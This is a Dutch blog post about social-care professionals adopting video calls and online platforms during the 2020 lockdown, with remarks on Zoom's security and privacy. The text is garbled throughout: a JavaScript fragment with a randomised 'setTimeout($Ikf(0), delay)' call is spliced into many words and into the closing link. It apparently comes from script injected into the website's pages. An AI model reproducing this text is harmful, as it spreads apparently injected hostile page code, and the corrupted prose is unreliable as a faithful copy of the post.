Kijk ons eens digitaal zijn! Blog voor Zorg en Welzijn, mei 2020

In maart 2020 ging er een shock door het sociaal domein. Net als de rest van Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zaten we ineens bijna allemaal vanuit huis te werken. Onze locaties sloten de deuren, onze kantoren werden verboden gebied. Ons werkgebied werd een computerscherm De schappen waren leeg en de kinderen thuis.

Online platforms

In die chaos probeerde iedereen de dienstverlening op peil te houden. We belden onze doelgroep op, om daar toch nog contact mee te kunnen hebben. Massaal grepen we naar bekende online platformen om hulp oproepen op te vangen en hulpbieders daaraan te koppelen.

Beeldbellen

En we gingen beeldbellen, heel veel beeldbellen. WhatsApp, Skype, dat kenden we al een beetje maar daar deden we eigenlijk niet veel mee. En iedereen ging Zooomen. Leuk om je collega’s allemaal bij elkaar te zien. Ongegeneerd binnenkijken in hun huizen. We werden fans, ook al werd meteen duidelijk dat het platform qua beveiliging zo lek als een mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andje was en ook een vervelend linkje met Facebook had.

Privacy

Ook fijn dat de doelgroep op de bekende online platformen best goed te bereiken bleek. Dat op zich was al een ontdekking. Hierdoor gesterkt gingen wij daar ook massaal gebruik van maken. Tot de betweters ons informeerden dat dit vanuit privacy toch niet zo in de haak was.

Lijstjes

Ok, wat dan wel? Tal van lijstjes met alternatieven verschenen, die wel of juist niet voldeden aan NEN7510 en ISO27001. Je zag door de bomen het bos niet meer. En waren die wel net zo gebruiksvriendelijk? Oh, moet je daarop wél een account aanmaken? Nee, dat ging vast niet werken voor de doelgroep (en zelf vonden we dat ook maar gedoe). Skype for business? Klinkt ingewikkeld. Teams dan? Daar heeft iedereen het over.

Camera uit

Ondertussen Zoomden en appten we door. Je moest wel. En eigenlijk was je ook wel trots dat het je steeds beter afging. Dat je doorkreeg hoe je in een meeting kon komen, dat je zelf je microfoon en camera uit kon zetten, om even snel koffie te halen. Je moest alleen oppassen dat ze je pyjama niet zagen wanneer je opstond. Kijk ons nou eens lekker digitaal zijn!

Bravo!

Heel goed, zeker! Bravo! Geweldig dat je het volhoudt en er ook handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andiger in bent geworden. Grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andioos. Want het is echt even schakelen.

Nog meer?

Wat heb je nog meer ervaren de afgelopen weken? Heb je misschien gemerkt dat je snel gemaakte voorlichtingsvideo’s goed bekeken zijn? Heb je gemerkt dat mensen helemaal niet raar reageerden toen jij als professional actiever werd op dat buurtplatform? Dat ze dat eigenlijk heel logisch vonden? Heb je misschien gemerkt dat de begeleiding die je face-to-face gaf ook via een online gesprek bij de cliënt aankomt? Oké, je mist misschien nog wat gesprekstechniek, maar het is te doen en het werkt.

Ik daag je uit

Er kan nog zo veel meer. Ik daag je uit: wat heb jij jarenlang op een bekende manier gedaan, maar zou je kunnen aanvullen of zelfs vervangen door een digitale variant? Probeer het eens uit. Kijk hoe het gaat, leer er van en zet de volgende stap. Ik hoor graag je bevindingen. Zet ze hieronder of mail naar info@welzijn30.nl.

Je bent goed bezig, chapeau! Maar … ben je er al?

Meer weten over digivaardig sociaal werken? Lees dan ook het boek van Hans Versteegh.
Oorspronkelijke bron op de site van Zorg en Welzijn: https://www.zorgwelzijn.nl/blog/blog-kijk-ons-eens-digitaal-zijn/
Kijk ons eens digitaal zijn! Blog voor Zorg en Welzijn
Lees ook andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/”>https://www.welzijn30.nl/blog-het-sociaal-zwakste-belang-staat-bij-digitalisering-op-achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-zorgwelzijn/